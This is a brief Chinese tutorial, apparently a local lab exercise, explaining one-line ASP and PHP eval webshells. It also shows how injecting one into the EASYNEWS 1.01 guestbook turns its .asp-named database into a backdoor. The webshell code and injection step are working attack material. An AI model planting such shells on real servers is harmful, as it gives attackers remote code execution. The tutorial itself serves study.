搭建模拟环境了解一句话木马的原理.
(1).创建1.asp文件,代码如下:
<%eval request("value")%>
(2).创建2.php文件,代码如下:
<?php @eval($_REQUEST['value']);?>
创建了1个asp一句话木马文件,1个php一句话木马文件,上面的代码的意思是获取get/post来的value值,当作脚本代码执行。
我们访问http://localhost/1.asp?value=Response.Write("gaojiufeng") 将会直接执行value的语句,输出gaojiufeng
我们访问http://localhost/2.php?value=echo gaojiufeng; 将会直接执行value的语句,输出gaojiufeng
也就说一句话木马的语句都会将get/post的代码执行,为什么中国菜刀能获取到网站和服务器的磁盘列表,就是通过对应的asp/php等代码获取到
2.通过本地的程序了解留言板提交一句话木马为什么可以直接连接
(1).下载EASYNEWS1.01程序在本地部署
(2).通过留言板留言,主页中填 <%eval request("value")%>,提交留言
我们访问http://localhost/ebook/db/ebook.asp?value=Response.Write("13092996963"),将会输出我的手机号码13092996962;
为什么访问/ebook/db/ebook.asp就能执行语句,我并没有创建一句话木马文件啊?由于ebook.asp是一个数据库accesss数据库文件,修改为asp后服务器认为数据库内容中的<%eval request("value")%>属于asp代码,其他不认识的一律认为是html标签输出。因此导致这个文件可以作为一句话木马连接。
